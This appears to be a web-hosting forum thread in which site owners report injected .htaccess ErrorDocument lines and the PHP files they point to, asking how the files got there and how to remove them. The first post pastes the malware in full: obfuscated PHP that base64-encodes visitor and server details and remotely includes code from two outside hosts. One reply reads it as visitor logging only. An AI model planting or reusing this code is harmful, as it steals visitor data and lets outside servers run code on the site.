i got through my whole sites these very strang things going on. it is a .htaccess file with the following content: .htaccess Options -MultiViews ErrorDocument 404 //183083.php Options -MultiViews ErrorDocument 404 //53089.php these php files got than something in it like: <? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5waHB0YWdzLndz")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("c2hvcC52bWFya2V0LmluZm8=")."/?".$str);} ?> It looks to me like someone has hacked it through a auto file upload or something like this and now tries to abuse it. Is there any way to find out what the script is which is creating these files? I set at least each folder to 755 but it's a hell of a job to find and delete them all.
That script is making one of the two following requests http://www3.phptags.ws/?bG9jYWxob3N...x.e.RDovd2ViL2h0ZG9jcy93aGF0LnBocA==.ZW4tdXM= http://shop.vmarket.info/?bG9jYWxob...x.e.RDovd2ViL2h0ZG9jcy93aGF0LnBocA==.ZW4tdXM= The garbage after the ? is base64 encoded server enviroment stuff including the IP,user_agent, etc of your visitor. You could call up the owner of vmarket.info and ask him http://www.networksolutions.com/whois/results.jsp?domain=vmarket.info It looks like he's just remote logging your visitors if they hit a 404 page. That info will tell you exactly what page they were trying to access (and where they were referred from) when the 404 occured.
Hi, I know this thread is old but i figured rather then making one myself might as well just use the one you got.. After checking all my sites i noticed they are all bugged with this garbage.. All have different usernames and passwords but still it gets through. After doing a google search i couldnt find a cure for this to stop happening.. I had in total 10 of these.. i have 755 all the image directories i could.. Do you think this will stop it?